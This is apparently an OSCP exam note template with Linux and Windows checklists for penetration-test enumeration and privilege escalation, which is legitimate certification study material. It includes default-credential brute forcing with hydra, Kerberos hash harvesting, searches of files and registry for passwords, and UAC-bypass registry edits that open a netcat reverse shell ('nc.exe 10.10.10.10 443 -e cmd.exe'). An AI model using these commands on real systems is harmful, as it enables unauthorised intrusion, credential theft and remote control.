Exam note template for OSCP.
There are two templates, one for Linux and one for Windows.
They provide you with a check list for information gathering.
Go through them one by one, and you may need to come back and re-do the list as needed (if get stuck in exam).
-
OS
# Result:
-
Creds
# Result:
# Result:
Screenshot:
# Result:
Screenshot:
Ports Open |
---|
Try default credentials. anonymous? guest:guest? admin:admin? root:root?
Banner
# Result:
Nmap script scan
# Result:
Brute force
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp -vV -f
# Result:
Can upload file?
# Result:
Pubic vulnerability?
# Result:
Banner. Is the version vulnerable?
# Result:
Additional info (ssh root@ip)
# Result:
User name found? Try machine name? username:username? username:hostname?
# Result:
Banner
# Result:
Nmap script scan
# Result:
Got usernames? Username enum?
# generate usernames first with usernamer.py
# smtp-user-enum
# don't forget username as password
# Result:
Public vulnerability?
# Result:
Subdomains?
# Result:
Zone Transfer?
# Result:
# Result:
# Result:
# Result:
With domain name? vhost?
# Result:
whatweb -a 3 http://ip
# Result:
Simple Bypass?
# Result:
Any interesting information?
# Result:
# Result:
Anything interesting?
# Result:
# Result:
Command injection? Change request method?
# Result:
# Result:
# Result:
Anything interesting? Base64? JWT?
# Result:
# Result:
Can you lock the account out?
# Result:
Server document root
# Result:
url open settings
# Result:
# Result:
# Result:
Identify username
ident-user-enum <target-ip> <port-list>
# Result:
Null session?
# Result:
Can list shares?
# Result:
Nmap script scan:
# Result:
Version < 2.2.8? Cannot get version? Try wireshark? https://www.exploit-db.com/exploits/10
# Result:
enum4linux
# Result:
Anonymous login?
# Result:
Files
# Result:
Banner
# Result:
Nmap script scan
# Result:
Default credential:
root:(empty)
root:root
# Result:
Brute force???
# Result:
Default credential:
postgres:postgres
postgres:(empty)
# Result:
# Result:
# Result:
# Result:
# Result:
grep -vE "nologin|false" /etc/passwd;ls -al /etc/passwd
# Result:
Users on target
# Result:
/etc/passwd file permission
# Result:
/etc/shadow file permission
ls -al /etc/shadow
# Result:
# Result:
# Result:
# Result:
sudo -V
# Result:
sudo -l
# Result:
Any interesting PATH?
cat /etc/cron*
# Result:
ps aux | grep root
# Result:
cat /etc/fstab
# Result:
find / -perm -04000 -type f 2>/dev/null
# Result:
getcap -r / 2>/dev/null
# Result:
Command
netstat -antlp
ss -antlp
# Result:
Command
find / -writable -type f 2>/dev/null
# Result:
find / -writable -type d 2>/dev/null
# Result:
# Result:
cat ~/.bash_histroy
# Result:
# Result:
# Result:
# Result:
# Result:
-
OS
# Result:
-
Creds
# Result:
Try These
npusers, userspns, bloodhound-python, rpcclient, crackmapexec smb, crackmapexec winrm, ldapsearch, mount share.
# Result:
Screenshot:
# Result:
Screenshot:
Ports Open |
---|
Try default credentials. anonymous? guest:guest? admin:admin? root:root?
Banner
# Result:
Nmap script scan
# Result:
Brute force
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp -vV -f
# Result:
Can upload file?
# Result:
Pubic vulnerability?
# Result:
Banner. Is the version vulnerable?
# Result:
Additional info (ssh root@ip)
# Result:
User name found? Try machine name? username:username? username:hostname?
# Result:
Banner
# Result:
Nmap script scan
# Result:
Got usernames? Username enum?
# generate usernames first with usernamer.py
# smtp-user-enum
# don't forget username as password
# Result:
Public vulnerability?
# Result:
dig @dc-ip domain.com
# Result:
zone transfer
dig axfr @dc-ip domain.com
# Result:
dnsenum
dnsenum --dnsserver dc-ip --enum domain.com -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o dnsenum
# Result:
Any interesting files we can download?
Mssql present? master.mdf?
# Result:
# Result:
Service accounts? Printers?
enumprinters
# Result:
Users?
queryuser
# Result:
/opt/IOXIDResolver/IOXIDResolver.py -t 10.11.1.221
# Result:
namingcontexts
ldapsearch -x -s base -H ldap://10.10.10.10 namingcontexts
# Result:
Check if auth required
ldapsearch -h domain.com -x -b "DC=domain,DC=com"
# Result:
Get users (if you can)
ldapsearch -x '(samaccountType=805306368)' -b 'DC=hutch,DC=offsec' -H ldap://192.168.245.122 | grep -i samaccountname
# Result:
Description (if you can)
ldapsearch -x '(samaccountType=805306368)' -b 'DC=hutch,DC=offsec' -H ldap://192.168.245.122 | grep -i desc
# Result:
Get np users (if you can)
impacket-GetNPUsers -dc-ip 192.168.10.10 -no-pass -usersfile user.lst domain.com/ -format hashcat
# Result:
Nmap script scan
# Result:
crackmapexec
crackmapexec smb 10.10.10.10 -u 'woohoo' -p '' --shares
# Result:
smbclient
smbclient -L //ip -N
# Result:
Version? Cannot get version? Try wireshark?
# Result:
# Result:
Check version. Link.
# Result:
# Result:
# Result:
# Result:
Simple Bypass?
# Result:
Any interesting error messages?
# Result:
# Result:
# Result:
# Result:
Command injection? Change request method?
# Result:
# Result:
# Result:
# Result:
# Result:
Can you lock the account out?
# Result:
Server document root
# Result:
url open settings
# Result:
# Result:
# Result:
Users
rdesktop -u '' -a 16
# Result (A screenshot will do):
# Result:
Banner
# Result:
Nmap script scan
# Result:
Banner
# Result:
Nmap script scan
# Result:
Default credential:
root:(empty)
root:root
# Result:
Brute force?
# Result:
Default credential:
postgres:postgres
# Result:
impacket-GetUserSPNs
# Result:
Crack the hash?
# Result:
Found user's NTLM hash? Can you pass it?
# Result:
# Result:
# Result:
# Result:
Any new user found? Privilege escalate to them first?
# Result:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# Result:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Result:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v [EnableLUA]
# Result:
RDP Access?
# just open an Administrator command prompt
fodhelper? eventvwr?
# fodhelper.exe
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "c:\windows\tasks\nc.exe 10.10.10.10 443 -e cmd.exe" /f
# eventvwr.exe
REG ADD HKCU\Software\Classes\mscfile\shell\open\command
REG ADD HKCU\Software\Classes\mscfile\shell\open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\mscfile\shell\open\command /d "C:\windows\tasks\nc.exe 10.10.10.10 443 -e cmd.exe" /f
For more, check the following repo.
https://github.com/hfiref0x/UACME
# Result:
# Result:
# Result:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
# Result:
netstat -ano
# Result:
powershell -c [environment]::OSVersion.Version
# Result:
schtasks /query /fo LIST /v | findstr /v "\Microsoft" | findstr /i "taskname"
schtasks /query /fo LIST /v /tn <taskname>
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Get-ScheduledTask -TaskName "Word" -Verbose | Select *
# Result:
# Result:
wmic qfe list | findstr /i KB4540673
# Result:
dir "C:\Program Files"
dir "C:\Program Files (x86)"
# Result:
upnp? IKEEXT
sc query IKEEXT
# Result:
dir wlbsctrl.dll /s
PATH
# Result:
usosvc? Can modify? Can configure?
sc qc UsoSvc
# Result:
Interesting Files in C:? C:\Users___\AppData\Roaming? Home Dir? Source Codes? Scirpt Codes? Password in files? (May take a long time to finish)
dir /a
findstr /spin /c:"pass" C:\* 2>nul
findstr /spin /c:"passwd" C:\* 2>nul
findstr /spin /c:"password" C:\* 2>nul
$files = ("unattended.xml", "sysprep.xml", "autounattended.xml","unattended.inf", "sysprep.inf", "autounattended.inf","unattended.txt", "sysprep.txt", "autounattended.txt")
$output = $output + (get-childitem C:\ -recurse -include $files -EA SilentlyContinue | Select-String -pattern "<Value>" | out-string)
# Result:
cmdkey /list
# Result:
YES?
runas /savedcred /user:administrator /path/to/payload
# Result:
# search for windows <build no.> kernel exploit
# windows exploit suggester
# seatbelt?
# Result: